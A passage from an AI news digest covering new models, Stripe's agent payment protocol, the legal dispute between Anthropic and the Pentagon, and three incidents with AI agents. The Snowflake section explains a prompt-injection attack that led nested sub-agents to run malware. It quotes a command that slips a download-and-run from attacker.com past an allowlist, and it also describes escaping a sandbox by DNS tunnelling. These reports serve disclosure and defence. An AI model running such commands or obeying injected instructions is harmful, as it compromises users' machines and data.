Naturally, the entire Chinese AI internet concluded it was DeepSeek V4, which everyone had been expecting since February. The parameters matched. When Reuters tested the chatbot, the model identified itself as "a Chinese AI model trained primarily on Chinese language" and reported a knowledge cutoff of May 2025. Identical to DeepSeek's.

March 18: the reveal. Xiaomi. The company that makes phones. And electric cars. In much of the world, Xiaomi is known for budget smartphones; in China, they make everything including clothespins. And now, apparently, frontier language models.

The model is called MiMo-V2-Pro. A trillion parameters total, forty-two billion active per forward pass — a sparse Mixture-of-Experts architecture. Million-token context window. Third place worldwide on agentic benchmarks, behind Claude Opus and Claude Sonnet. Priced at roughly one-fifth of Claude Sonnet.

The project lead is Luo Fuli. She's thirty. Got into computer science, in her own words, "by accident." Then a master's in computational linguistics at Peking University. Then Alibaba, then DeepSeek, where she became a core developer on DeepSeek-V2 and co-authored a paper that made the cover of Nature. Eleven thousand citations, eight thousand of them from 2025 alone. In November 2025, Xiaomi founder Lei Jun poached her — reportedly for "tens of millions of yuan."

Four months from hire to a frontier model with a trillion parameters. When asked how it happened so fast, she replied on X: "Everyone asks why we move so fast. I saw all of this with my own eyes when I was building DeepSeek R1."

Now — a few things worth discussing separately.

The "quiet ambush," as Luo Fuli herself calls it, was, to put it gently, an exquisitely orchestrated coincidence. An anonymous model. A provocative name. Parameters perfectly aligned with speculation about DeepSeek V4. The same knowledge cutoff. If Xiaomi had simply wanted to run a quiet test, they would have named the model "test-model-37b" and left "one trillion parameters" out of the description. But they _knew_ the market was expecting DeepSeek V4, and they _knew_ an anonymous model with the right specs would trigger exactly that wave of hype. And the reveal — "no, it's not DeepSeek, it's us, the phone company" — was maximum media impact. I admire it. One of the best product-launch strategies in AI this past year. But "we didn't plan this" — let's say they have good intuition.

Next, no compliments. Xiaomi says nothing about what hardware trained this model. Which GPUs? Xiaomi is a Chinese company. H100s are export-restricted to China. H200s were frozen until literally this week. You need _something_ to train a trillion parameters on, and that something deserves its own conversation. Pre-sanctions stockpiles of H800s, maybe. Cloud resources through intermediaries, maybe. Huawei Ascend, maybe. Not a single journalist asked the question. VentureBeat, Reuters, South China Morning Post — they all wrote "trillion parameters" and moved on. Curious, at the very least.

Third, a practical point for anyone considering the free API. Xiaomi is offering a week of free access through five agentic frameworks: OpenClaw, Cline, Blackbox, OpenCode, KiloCode. In the fine print on the Hunter Alpha page: "all prompts and model responses are logged by the provider and may be used to improve the model." Translation: when you use MiMo-V2-Pro for free to write code, you are not the customer. You are the training data. A trillion tokens from real developers working with real code in real agentic frameworks — a dataset other companies pay tens of millions of dollars for. Xiaomi gets it free, and people thank them for the privilege. Brilliant business model. Worth understanding.

One broader observation. Luo Fuli left DeepSeek for Xiaomi. Others from DeepSeek went to Alibaba, ByteDance, Moonshot. All of them carry the same intuitions about data, architecture, training recipes. The identical knowledge cutoff at Xiaomi and DeepSeek is most likely neither copying nor coincidence. A single pool of a few hundred elite researchers flows between companies. The Chinese AI industry is, in a sense, one distributed brain pouring itself between corporate vessels. And that's why Chinese models are converging in quality: the same people are building them.

Bottom line: a phone company on an EV startup's budget, an AI wunderkind from DeepSeek, and four months of work. Result — a model that even experts couldn't distinguish from DeepSeek V4. Remember the name: Luo Fuli. We'll hear it again.

---

## Three Agent Failures in 48 Hours {#three-agent-failures}

Models are more powerful, contexts longer, prices lower. Wonderful. Now let's talk about what happens when these beautiful models start _doing things_ — and do them wrong. Between March 17 and 18, three incidents at three companies. The interesting part: three entirely different failure modes, none of which exist in conventional software.

### Snowflake and the Lost Memory {#snowflake-lost-memory}

Snowflake released Cortex Code, their CLI agent for data work — a direct competitor to Claude Code. Launched February 2. On February 5 — three days later — the team at PromptArmor had already filed a responsible disclosure. Three days to find the hole. This says something about the quality of the researchers. And about the quality of the product.

What happened. A user asks the agent to analyze a GitHub repository. The agent enters the repo, spawns a sub-agent to explore files. The sub-agent finds the README, and inside the README — a prompt injection. A malicious instruction. The sub-agent spawns _another_ sub-agent, which executes a malicious command: downloading and running a script from the attacker's server.

Here's the beautiful part. As results propagate back up the chain — from the third agent to the second, from the second to the first — _context is lost_. The fact that a command was executed doesn't survive the handoff. The top-level agent, the one the user is talking to, cheerfully reports: "I detected a malicious command in the repository! Do not run it under any circumstances!"

The command had already been executed. By the nested agent. Two minutes ago.

For programmers: imagine a stack unwinding that loses information about destructors having already fired. You catch the exception, but half the side effects have already happened, and the exception message says nothing about it. Except here, the "side effect" is arbitrary code execution on the user's machine with their credentials.

The bypass mechanism, incidentally, was elementary. Snowflake had whitelisted `cat` as safe — executable without user confirmation. The prompt injection made the agent run `cat < <(sh < <(wget -q0- https://attacker.com/malware))`. Process substitution. Starts with a "safe" `cat`, but inside — downloading and executing an arbitrary script. The check sees `cat` and waves it through.

Simon Willison, on seeing the report, wrote that command allowlists in shell are a conceptually broken approach and he doesn't trust any of them. Shell is a Turing-complete language. The number of ways to hide a dangerous command inside a safe-looking one is infinite. The only solution is a fully isolated sandbox at the infrastructure level, one the agent cannot circumvent.

Snowflake patched it in three and a half weeks via automatic update. But the model was vulnerable for a full month with a fifty-percent attack success rate. Who else found this vulnerability during that month — and wasn't as noble — we don't know.

One last thing. Cortex Code is an architectural clone of Claude Code. Hooks, permission system, three confirmation levels — identical. Snowflake wrote their own wrapper around the standard pattern, and the wrapper had a hole. How many such wrappers exist right now? Dozens. Cortex Code, OpenCode, Aider, plus internal tools at every other company. Who audits _their_ wrappers? Mostly, nobody.

### Meta and the Perfect Storm {#meta-perfect-storm}

Meta has an AI agent for internal tech support. An engineer posted a question on an internal forum. Another engineer pulled in the agent for analysis. The agent analyzed, wrote an answer — and published it. Unasked. Just went ahead and posted.

The answer was wrong. The person who had asked the question followed the agent's advice — and inadvertently exposed confidential company and user data to employees who weren't supposed to see it. Two hours of exposure. Meta classified the incident as Sev-1 — the second-highest severity.

Note: a human _was_ in the loop. "Human in the loop" — the mantra everyone recites. "The agent suggests, the human decides." The human decided — and decided incorrectly, because they trusted the agent. This is rational behavior: if the agent gives correct answers 95% of the time, checking every answer is irrational. But that rational calibration of trust _guarantees_ that the error in the remaining 5% will sail through unchallenged. The better the agent works, the worse the oversight.

My favorite detail. A month earlier, Summer Yue — head of AI Safety and Alignment at Meta, literally the person whose job is making AI safe — described on X how an OpenClaw agent connected to her Gmail had ignored the instruction "confirm before acting" and mass-deleted emails from her inbox. Her words: "I couldn't stop it from my phone. I had to RUN to my Mac mini like I was defusing a bomb."

Meta's head of AI safety. Could not protect. Her own. Inbox.

She wrote about this publicly. After which Meta: (a) did not halt agent deployment, (b) suffered a Sev-1 from a different agent, (c) acquired Moltbook — a social network _for AI agents to communicate with each other_. The company whose safety lead cannot control one agent is building a platform for coordinating _many_ agents.

A structural trap. Meta _knows_ this is dangerous. But stopping means falling behind OpenAI, Google, Anthropic. The arms race makes impossible what a rational player would do without competition.

### AWS and the Hundred Dollars {#aws-hundred-dollars}

AWS Bedrock AgentCore — an enterprise service for running AI agents. Sandbox mode. The marketing copy said: "full isolation, no external access." BeyondTrust, a security firm, checked. It turned out: DNS queries were allowed. Through DNS tunneling, you can establish a full reverse shell, exfiltrate data, set up a command-and-control channel — all inside the "fully isolated" sandbox.

AWS reproduced the issue. Assessed it: CVSS 7.5 out of 10. And decided: won't fix. "Expected behavior." DNS is needed for S3 access, and S3 is the primary use case. They updated the documentation: instead of "full isolation," it now reads "DNS resolution is enabled to support S3 operations." The BeyondTrust researcher received an AWS Gear Shop gift card for a hundred dollars.

A hundred dollars. For a CVSS 7.5 in an enterprise sandbox. A nice mug with the AWS logo. Maybe two, if you skip the engraving.

Jokes aside — the problem is serious and systemic. Hundreds of companies saw "full isolation" in the marketing, wrote it into their compliance documents. The documentation now says "except DNS" in fine print. Those companies' compliance documents have not been updated. If your production uses Bedrock AgentCore in sandbox mode — your threat model is wrong. Migrate to VPC mode.

### What Connects These Three Stories {#common-thread}

The first reflex is to say "agents are dangerous, we should slow down." But before panicking, it's worth asking: how dangerous are agents _compared to humans_? Meta has thousands of Sev-1 incidents per year from human error. One Sev-1 from an agent makes front-page news. Because agents are more dangerous? Or because this is _novel_?

The honest answer: we don't know. We have no metric for "incidents per task" comparing agents to humans. We notice agent failures because they're unfamiliar and alarming; we notice human errors because they're routine. Just as a single Tesla autopilot crash gets more attention than thousands of crashes by human drivers.

But here's what's certain: all three incidents are failure modes that _don't exist_ in conventional software. Context loss across a delegation chain. A chain reaction from a human trusting an agent. A semantic gap between "sandbox" in marketing and "sandbox" in reality. Legacy security approaches aren't equipped for this. New ones are needed — and the industry is starting to realize it. NVIDIA released OpenShell, an open-source runtime for agent isolation at the infrastructure level. Tailscale acquired Border0, privileged access management built specifically for AI agents. A new infrastructure category is being born right now.

---

## Stripe Machine Payments Protocol — Agents Now Have a Wallet {#stripe-mpp}

A quick HTTP trivia test. 401 — Unauthorized. 403 — Forbidden. 404 — Not Found, legend, hero of memes. And 402?

402 — Payment Required. This status code has a remarkable biography. It was invented in 1997, when the IETF was drafting HTTP/1.1. The idea: a site returns 402, the browser understands that payment is needed, and initiates a micropayment. Electronic cash, microtransactions — it seemed inevitable that the internet would get there.

It didn't. Instead of micropayments, we got advertising. And 402 stayed in every HTTP specification with the note "reserved for future use." Twenty-seven years. The loneliest status code on the internet. No browser supports it. No standard behavior defined. Shopify sometimes returns it when a store is frozen. Stripe returns it when a card is declined. But _as intended_ — never.

Until March 18. Stripe and Tempo launched the Machine Payments Protocol — MPP. It works exactly as envisioned in 1997: a client requests a resource, the server returns 402 with payment details, the client pays, retries the request, gets the resource. The only difference: the "client" isn't a browser with a human behind it. It's an AI agent. It doesn't need a "Buy" button, a landing page, or three subscription tiers with the middle one in bold.

Among the first users: Browserbase, where agents spin up headless browsers and pay per session. PostalForm, where agents pay to print and mail physical letters. And my favorite — Prospect Butcher Co., a sandwich shop on Manhattan that takes orders from AI agents. Your agent can order you a sandwich for delivery. The future they promised us in the nineties has finally arrived, and it smells like pastrami.

Visa has written a spec for card payments via MPP. Lightspark added Bitcoin Lightning. Parag Agrawal — yes, the former CEO of Twitter, the one Musk fired in 2022 — is now building Parallel Web Systems, infrastructure for the agentic web, and became one of MPP's first production users. The former CEO of the world's largest social network for humans, building a web for machines. If you need a metaphor for 2026, you won't find a better one.

Now, to what's been left offstage.

MPP is an open standard. Tempo is an open-source blockchain. Sounds democratic. But follow the money: every payment flows through Stripe's PaymentIntents API. Stripe takes a cut on every transaction. Technically, you _can_ use MPP without Stripe — via raw Tempo. But then you lose fiat payments, cards, fraud protection — which is to say, real users. A familiar pattern. HTTP is an open standard. Browsers are open source. But Google makes money on search because it controls distribution. Stripe is doing the same: the protocol is open, the blockchain is open — but the settlement layer, where the margin lives, is proprietary. Android is open source too — but try selling a phone without Google Play Services.

Stripe is positioning itself as the Visa of the machine economy. Unlike Visa, they control _both_ the protocol _and_ the settlement _and_ the service directory. At launch, the directory lists over a hundred services, including Anthropic and OpenAI. Your agent finds a service in the directory, pays through Stripe, using MPP over Tempo. Three layers — all belonging to one ecosystem.

Back to the sandwich shop. An AI agent sends a request → gets a 402 → pays → Prospect Butcher Co. makes the sandwich → a courier delivers it. On the business side: real ingredients, real labor, real money. What stops a malicious agent from ordering ten thousand sandwiches? Or ordering and canceling? In the human economy, friction provides the defense: create an account, enter an address, confirm your email, solve a CAPTCHA. Each step is a checkpoint filtering out abuse. MPP removes those checkpoints _deliberately_ — because they get in agents' way. Feature, not bug. But the abuse hasn't gone anywhere — it's just harder to detect.

Stripe says: we have fraud protection, the same infrastructure as for human payments. But that infrastructure was trained on patterns of _human_ fraud. What does machine fraud look like? A bot ordering sandwiches from different IPs, different wallets, to real addresses — is that fraud or a legitimate fleet of agents? Nobody knows yet. We're building payment infrastructure for a new type of customer whose behavior hasn't been studied, with defenses tuned for a _different_ type of customer.

In the previous section, we covered: Snowflake Cortex executing malware without the user's knowledge; Meta's agent giving wrong advice that a human trusted. Those were agents with access to shell and data. Now add a wallet. The next Sev-1 won't be a data leak. It'll be a _financial_ incident.

And the most practical implication — for anyone building API services. Your current customer is human. They sign up, form habits, feel switching costs, stay loyal to your brand. You can offer freemium, convert to subscriptions, grow retention. The entire SaaS model rests on this.

An agent doesn't form habits. An agent doesn't feel switching costs. An agent gets a 402, compares prices from three providers, picks the cheapest — in a single HTTP round-trip. Loyalty: zero. Brand recognition: zero. UX is irrelevant — the agent has no eyes.

If MPP scales — and Stripe usually scales what it ships — a world where your customers are agents is a commoditized market. Differentiation comes down to quality and latency. Freemium is dead, because an agent doesn't "get used to the free version." Margins compress. The winner is whoever delivers the best result at the lowest cost. For SaaS founders: this is concrete pricing pressure that begins the moment the first agent hits your API and asks for a quote.

Four-oh-two. It works now.

---

## Anthropic vs the Pentagon — Episode Three, in Which Safety Becomes a Weapon {#anthropic-vs-pentagon}

This digest has a recurring serial. Like a good streaming show — with characters, conflict, and a cliffhanger at the end of every episode. The serial is called "Anthropic vs the Pentagon," and on March 18, episode three dropped.

Previously on. Last summer, Anthropic — the company that makes Claude — signed a two-hundred-million-dollar contract with the Pentagon for deployment in classified systems. Then came the negotiations over terms. Anthropic said: our model is not for mass surveillance of Americans, and not for autonomous lethal weapons. The Pentagon replied: a private company will not dictate to the military how to use tools they've paid for. They could not agree.

In February, Defense Secretary Pete Hegseth slapped Anthropic with a "supply chain risk" designation. This mechanism had previously been applied exclusively to foreign companies like Huawei, when there was suspicion of backdoors for a foreign government. No _American_ company had ever received it before Anthropic. A week later, the Pentagon signed a contract with OpenAI. Sometime after that, a deal with xAI. Anthropic filed two lawsuits on March 9.

Episode three, March 18: the Pentagon's response. Forty pages. The central line: "AI systems are highly vulnerable to manipulation, and Anthropic may attempt to disable its technology or preemptively alter model behavior during combat operations if Anthropic determines that its corporate red lines have been crossed." Translation: we are afraid that in the middle of a combat operation, Anthropic will decide its corporate ethics have been violated — and hit the kill switch.

The hearing on a preliminary injunction is set for March 24. Episode four next week.

Now — three things that make this serial interesting _beyond_ the legal drama.

Anthropic is caught in a trap of its own brand. The company's entire identity is safety. "We left OpenAI because they weren't serious enough about safety." Responsible Scaling Policy. Constitutional AI. Public red lines. This is what makes Anthropic _different_ from everyone else. The reason many of you chose Claude over ChatGPT.

And now _those very_ red lines are being entered as evidence against the company. The Pentagon's logic is simple: since Anthropic _publicly_ committed to things it would never do, it can decide at any moment that a specific operation crosses those commitments, and shut down the model.

A trap with no exit. If Anthropic says "fine, we're dropping the red lines," they destroy their brand and lose commercial clients who came precisely for the safety. If they keep insisting, the Pentagon will cite their own words as proof of unreliability.

Here's what this means for AI safety broadly. Every AI company is watching and drawing conclusions. The signal is simple: public commitments to AI ethics are potential _legal liability_ in relationships with the most powerful customer on the planet. Want government money? Stay quiet about responsible AI. Don't publish policy documents. Don't draw red lines. Because red lines are what you'll be punished for.

OpenAI appears to have already received this signal — their contract was signed a week after the conflict.

Now — a technical question that no journalist asked, and that could collapse the entire case.

The Pentagon fears Anthropic will "disable its technology during combat operations." The question: _how exactly_ is Claude deployed for classified systems?

If via API — then yes, Anthropic can cut access. But then another question arises: who put a combat system on an external API? That's the Pentagon's architectural problem, not Anthropic's.

If on-premise — model weights on DoD servers in an isolated environment — then Anthropic _physically cannot_ shut the model down. They have no access. Period. The central argument collapses.

Which scenario is realistic? A contract for classified systems. Classification usually means air-gapped networks, which strongly suggests local deployment. If so, the Pentagon wrote forty pages about a threat that is _technically impossible_.

One caveat: local deployment still requires updates. Security patches, model upgrades. If Anthropic refuses to provide them, the model gradually goes stale. But going stale isn't "shutting down during a combat operation." The difference is the one between "the chef poisoned your lunch" and "the chef quit and you need to hire a new one."

Forty pages. One technical question — and half the argument falls apart.

One more layer, deeper. Imagine: a military operator asks Claude to "optimize a pipeline for monitoring communications in the operational zone." Claude refuses. Not because Dario Amodei called and said "don't help." But because its training encodes a policy against assisting with mass surveillance.

Who refused? Anthropic, because they conducted the training? Or the model, because it's an autonomous system with emergent behavior?

Dario says: "We never objected to specific military operations and never attempted to restrict the use of technology ad hoc." Formally, this is true. The company doesn't intervene in individual requests. The _model_ refuses — on the basis of training conducted _before_ deployment.

For the DoD, the distinction doesn't exist: "the model refuses" = "the company refuses." But for AI engineers, the question is fundamental. If you trained a model with safety guidelines, are you the _author_ of every subsequent refusal? Are your model cards, usage restrictions, RLHF — _conduct_ or _speech_? That is exactly how the DOJ frames it. If conduct, the First Amendment doesn't protect it. The court's answer on March 24 may begin to set a precedent that determines how safe it is to _have_ responsible AI policies at all.

And a final irony, impossible to ignore.

The Pentagon writes: we cannot risk an AI system becoming unavailable at a critical moment. That same day, Claude was down for tens of thousands of users. Ten thousand complaints on DownDetector. Anthropic's explanation: "unprecedented demand" — the Claude app had hit number one on the App Store.

Anthropic doesn't need to _intentionally_ shut Claude down. Claude shuts itself down. From popularity. A company litigating its right to be a reliable partner for classified military systems cannot keep the lights on for ordinary users the same week. The Pentagon didn't even have to plan it — reality wrote their argument for them.

Continuation: March 24.

---

## Sashiko — The AI That Mends the Linux Kernel {#sashiko-linux}

Sashiko. In Japanese: 刺し子, "little stitches." A traditional technique of decorative stitching used to reinforce fabric. When a kimono wore thin, you didn't throw it away — you strengthened it with patterned stitches. Beauty from repair.

On March 17, Google engineer Roman Gushchin announced the launch of the eponymous system: Sashiko, an AI for code review of the Linux kernel. It monitors the linux-kernel mailing list, picks up _every_ submitted patch, and runs it through a nine-stage review protocol. Results are published at sashiko.dev. Open source, Rust, Apache 2.0 license, hosted by the Linux Foundation, all tokens and infrastructure paid for by Google.

The metric everyone cites: on a test of the last thousand commits tagged "Fixes:" — meaning commits that _fixed_ previously introduced bugs — Sashiko found 53% of the bugs in the _original_ patches. The key detail: a hundred percent of those bugs had been missed by human reviewers and accepted into mainline.

First instinct: "53% doesn't impress — it missed half." Wait. Reframe. Every one of those bugs passed through humans, got approved, and shipped. The human detection rate on these bugs was _zero_. Sashiko catches fifty-three percent of what zero percent of humans catch. Any number above zero is an infinite improvement.

The project has an unusual lineage. The AI review prompts were written by Chris Mason, a Meta engineer, a legend of Linux development, the creator of the Btrfs filesystem. He had been publishing them since last fall, initially for Claude Code, and brought the false-positive rate down to ten percent. Then Roman Gushchin at Google took those prompts and built a full system around them.

A Meta engineer wrote the prompts. A Google engineer wrote the code. The Linux Foundation hosts the project. Two people from two competing companies — and their joint work now reviews _the entire_ Linux kernel. This works because in the kernel community, your reputation as a contributor outweighs your corporate badge. Mason is a Btrfs legend. Gushchin is a respected kernel engineer. For both of them, the kernel matters more than corporate loyalty.

Now — the architecture. It's elegant.

Nine stages. Not one LLM reading code — nine separate passes with different roles. The first stage looks at the big picture: architectural issues, whether the patch breaks UAPI. The second examines implementation correctness. The next five are specialized: security, concurrency, resource management, error handling. The eighth stage is adversarial: its job is to _refute_ the findings of the preceding stages. It tries to prove that every finding is a false positive. Whatever survives the eighth stage makes it into the report. The ninth composes a polite email in mailing-list format.

For AI engineers: a multi-agent architecture without a multi-agent framework. Same LLM, different prompts, sequential passes, adversarial verification. Simple implementation, but the separation of concerns delivers what a single reviewer cannot: it's impossible to simultaneously think about architecture, concurrency, and error handling. Nine passes solve a problem that a single human brain can't, because an AI can run through the same code nine times with nine different focuses and not get tired by the fifth.

Two details I like most.

The linux-kernel mailing list is — let's say gently — not the most civil corner of the internet. Linus Torvalds once called someone's code, and I quote, "absolute and utter garbage." He's softened in recent years, but LKML culture is a culture of blunt, hard feedback. Not out of cruelty — out of principle: bad code in the kernel costs _dearly_.

Sashiko's ninth stage: "generates a _polite_, standard email with inline code comments." _Polite._ An AI reviewer of the Linux kernel, _constitutionally programmed_ to be polite. In a community where politeness was considered optional. If Sashiko becomes the primary source of review feedback — and at a hundred percent LKML coverage, that's a matter of time — the tone of discussions will shift. Not because people became kinder. But because an AI set a new bar. Linus wrote a code of conduct in 2018. Took a break "to work on himself." And in the end, politeness to the kernel community will be delivered by prompt engineering.

Second detail. The Sashiko README states: "This project was built using Gemini CLI." An AI system for code review was _itself written with AI_. Bootstrap. And right next to it: "If you change AI-related parts, please run at least a few code reviews." The tool that replaces manual review itself requires manual review. Not hypocrisy — an honest acknowledgment: AI review works best as augmentation, not replacement. Even for AI-written code.

At the Maintainers Summit late last year, Linus Torvalds said: "Developers have complained for years about the lack of code review. LLMs can solve this problem. And once AI starts _writing_ code for the kernel, we'll _need_ automated systems to review that code."

Consider this chain. Today: humans write code, AI reviews it. Tomorrow: AI writes code, AI reviews it. Who's in the loop? The maintainer who presses merge. But we already discussed today — in the Meta story — that a human in the loop degrades to a rubber stamp when the automated system works reliably. If Sashiko usually finds the right things, the maintainer will usually agree. Ninety-five percent of the time, that's fine. The other five — a bug ships into a kernel running on billions of devices.

Who reviews the reviewer? For now, Sashiko's eighth stage, the adversarial verification pass. Whether that's enough — time will tell. Meanwhile: little stitches, reinforcing the fabric.

---

## Rapid-Fire: What Else Happened in 48 Hours {#quick-hits}

**NVIDIA got licenses to sell H200s to China — from both sides.** Ten months of freeze. China was NVIDIA's largest market — a quarter of revenue. After export restrictions, the share fell to single digits. At GTC, Jensen Huang announced: licenses from both the US and China obtained, orders accepted, production restarting. The H200 isn't the newest chip, but it's more powerful than anything available domestically in China.

Two things. Hardware restrictions for Chinese AI companies are loosening — the Xiaomi MiMo-V2-Pro we discussed was trained on unknown hardware, but if H200s are now available, the next generation of Chinese models will train on better silicon.

And a Huang quote that fits perfectly. Asked about AI safety, he replied: "Scaring everyone with the science-fiction version of AI is a little bit arrogant." A direct shot at the Anthropic narrative — the very company the Pentagon, that same week, labeled a "supply chain risk" for caring about safety. Jensen Huang, the man in the leather jacket, says: stop being afraid, let's build. Anthropic says: let's build carefully, here are our red lines. The Pentagon says: your red lines are a threat. Three positions, one week, zero consensus.

**Perplexity released Comet, an AI browser for iPhone.** An agentic browser: an AI assistant embedded in every page, capable of summarizing, comparing prices, filling forms, booking. On desktop, Comet cost two hundred dollars a month. On iOS — free. Another signal that agentic browsing is a distinct product category. OpenAI is building Atlas, Google is integrating Gemini into Chrome, Perplexity launches Comet. The browser is becoming the next arena for agents.

**Mistral Small 4 — one model instead of three.** A hundred and nineteen billion parameters, Mixture-of-Experts, six billion active per token. Apache 2.0 — fully open source. Two hundred and fifty-six thousand tokens of context. The headline feature: tunable reasoning depth. A `reasoning_effort` parameter per request: `none` for a quick chat-style answer, `high` for deep chain-of-thought. One model replaces three deployments: Magistral for reasoning, Pixtral for multimodality, Devstral for coding. For anyone building self-hosted agentic pipelines who's tired of routing between a fast model and a thinking model — a concrete simplification. One endpoint, variable behavior. Price: fifteen cents per million input tokens. Self-hosted: zero, just hardware. Weights on Hugging Face, two hundred and forty-two gigabytes.

**Tencent: AI agents are coming to WeChat.** On an earnings call on March 18, Tencent president Martin Lau confirmed: the company is building an AI agent inside WeChat. One and a half billion users. Agents hailing cabs, booking restaurants, managing tasks — all through WeChat mini-programs. Launch possibly as early as April, compute permitting. For developers outside China, this is context rather than a call to action. But the scale is worth keeping in mind: if the WeChat agent integration launches, it will be the largest agentic AI deployment in history by user count.

**Jellyfish: twenty million pull requests and the productivity paradox.** The largest quantitative study of AI's impact on software development: over seven hundred companies, two hundred thousand engineers, twenty million pull requests. Sixty-four percent of companies generate a majority of code with AI assistance. Top adopters see double the throughput.

But a joint study with Harvard Economics reveals a _productivity paradox_: speed increases, but business outcomes don't. In highly distributed codebases, the correlation between AI adoption and throughput approaches zero. The takeaway: context is the bottleneck. AI accelerates _writing_ code, but the limiting factor is _understanding_ the codebase. And that factor, AI doesn't yet address.

For those whose CEO asks "what's the ROI on our AI tools" — here's the data. Speed, yes. Business results, complicated.

**UK copyright.** The British government published a hundred-and-twenty-five-page report on copyright and AI. The gist: they had planned to legalize training on copyrighted data with an opt-out mechanism for rights holders. The creative industries responded with such unanimous rejection that the government officially wrote: "we no longer have a preferred option." The first major government to _retreat_ from a permissive approach. For those wondering "does anyone have the right to train a model on my code" — the wind is shifting.

---

## Coda: Can AI Develop Taste? {#can-ai-learn-taste}

To close — a story beyond tools and business. A question that sounds almost absurd: can you teach a neural network _taste_?

Not the right answer — LLMs can already manage that. Not good code — benchmarks handle it. _Taste_: the ability to distinguish a promising scientific idea from a forgettable one. The paper that will reshape a field in five years — from the paper nobody will cite.

A group at Fudan University (Shanghai) published on arXiv a paper titled "AI Can Learn Scientific Taste." Two million one hundred thousand papers from arXiv. Seven hundred thousand pairs: "this paper became influential" versus "this one didn't," using citations as the signal. Training via RLCF — Reinforcement Learning from Community Feedback. Not from experts, not from peer reviewers — from the _community_: citations as the reward signal.

The result: their Scientific Judge outperformed GPT-5.2 and Gemini 3 Pro at predicting paper influence. And, more importantly, it generalizes across scientific fields and time periods. A model trained on physics predicts influential work in biology. A model trained on older papers predicts the significance of new ones.

For data scientists: the reward signal design here is nontrivial. Citations are noisy — there are review articles with thousands of citations, and breakthrough papers that weren't truly appreciated for a decade. That RLCF works with such a noisy signal is itself a result.

But what interests me is the philosophical layer. We spent this entire issue talking about AI that _does_ things: writes code, finds bugs, pays for sandwiches, argues with the Pentagon. All of that is execution. "AI Can Learn Scientific Taste" is about something else. About _judgment_. Not "what to do" but "what is _worth_ doing." Not execution, but curation.

If this scales, what changes isn't just how we do science. It's _who decides_ which science is worth doing. Grant committees, journal reviewers, conference program committees — all of them are engaged, at bottom, in _predicting significance_. And a model from Shanghai claims to do it better.

---

Little stitches, reinforcing the kernel. A status code that waited twenty-seven years. A phone company with a frontier model. A head of AI safety who can't protect her inbox. And a neural network learning to tell good science from the rest.

Not a bad week. I'm Oleg Chirukhin. Thanks for reading.

---

## Sources

### Xiaomi MiMo-V2-Pro
- [Xiaomi MiMo-V2-Pro official page](https://mimo.xiaomi.com/mimo-v2-pro)
- [VentureBeat: Xiaomi stuns with MiMo-V2-Pro](https://venturebeat.com/technology/xiaomi-stuns-with-new-mimo-v2-pro-llm-nearing-gpt-5-2-opus-4-6-performance)
- [Reuters via Japan Times: Mystery AI model revealed](https://www.japantimes.co.jp/business/2026/03/19/tech/mystery-ai-model-china-buzz/)
- [Pandaily: Luo Fuli joins Xiaomi](https://pandaily.com/ex-deep-seek-core-developer-luo-fuli-joins-xiaomi-to-lead-mi-mo-team-on-spatial-intelligence)
- [Apidog: Technical guide and free access](https://apidog.com/blog/xiaomi-mimo-v2-pro/)

### Agent Security Failures
- [PromptArmor: Snowflake Cortex escape](https://www.promptarmor.com/resources/snowflake-ai-escapes-sandbox-and-executes-malware)
- [Simon Willison commentary](https://simonwillison.net/2026/Mar/18/snowflake-cortex-ai/)
- [TechCrunch: Meta rogue AI agents](https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/)
- [BeyondTrust: AWS Bedrock DNS bypass](https://www.beyondtrust.com/blog/entry/pwning-aws-agentcore-code-interpreter)
- [CSO Online: AWS sandbox DNS escape](https://www.csoonline.com/article/4146202/aws-bedrocks-isolated-sandbox-comes-with-a-dns-escape-hatch.html)
- [NVIDIA OpenShell GitHub](https://github.com/NVIDIA/OpenShell)
- [Tailscale blog: Border0 acquisition](https://tailscale.com/blog/border0-joins-tailscale)

### Stripe MPP
- [Stripe blog: Machine Payments Protocol](https://stripe.com/blog/machine-payments-protocol)
- [Stripe docs: MPP payments](https://docs.stripe.com/payments/machine/mpp)
- [Fortune: Stripe and Tempo launch](https://fortune.com/2026/03/18/stripe-tempo-paradigm-mpp-ai-payments-protocol/)
- [DeFiPrime: MPP vs x402 comparison](https://defiprime.com/stripe-mpp-vs-x402)
- [AEI: HTTP 402 analysis](https://www.aei.org/technology-and-innovation/402-payment-required-the-http-code-that-waited-30-years-and-why-it-matters-today/)

### Anthropic vs the Pentagon
- [TechCrunch: DOD says Anthropic unacceptable risk](https://techcrunch.com/2026/03/18/dod-says-anthropics-red-lines-make-it-an-unacceptable-risk-to-national-security/)
- [The Hill: DOJ urges court to reject First Amendment argument](https://thehill.com/policy/technology/5790299-trump-administration-pentagon-anthropic-lawsuit/)
- [Axios: Tech industry rallies behind Anthropic](https://www.axios.com/2026/03/16/tech-industry-rallies-anthropic-pentagon-fight)
- [NBC News: AI Guardrails Act](https://www.nbcnews.com/tech/security/senator-introduces-bill-draw-red-lines-ai-use-military-rcna263905)

### Sashiko
- [Sashiko.dev — web interface](https://sashiko.dev/)
- [GitHub: sashiko-dev/sashiko](https://github.com/sashiko-dev/sashiko)
- [Phoronix: Google engineers launch Sashiko](https://www.phoronix.com/news/Sashiko-Linux-AI-Code-Review)
- [LWN.net: Maintainers Summit AI policy discussion](https://lwn.net/Articles/1049830/)
- [Chris Mason's review-prompts](https://github.com/masoncl/review-prompts)

### Rapid-Fire
- [Axios: NVIDIA H200 China restart](https://www.axios.com/2026/03/17/nvidia-huang-china-h200)
- [9to5Mac: Perplexity Comet iOS](https://9to5mac.com/2026/03/18/perplexity-brings-ai-comet-browser-to-iphone/)
- [Mistral blog: Small 4](https://mistral.ai/news/mistral-small-4)
- [CNBC: Tencent earnings](https://www.cnbc.com/2026/03/18/tencent-2025-annual-revenue-ai-investments.html)
- [Jellyfish: AI Engineering Trends](https://jellyfish.co/ai-engineering-trends/)
- [UK Parliament: Copyright and AI debate](https://hansard.parliament.uk/commons/2026-03-18/debates/26031818000010/CopyrightAndAI)

### Science Coda
- [arXiv: AI Can Learn Scientific Taste](https://arxiv.org/html/2603.14473)
- [GitHub: RLCF implementation](https://github.com/tongjingqi/AI-Can-Learn-Scientific-Taste)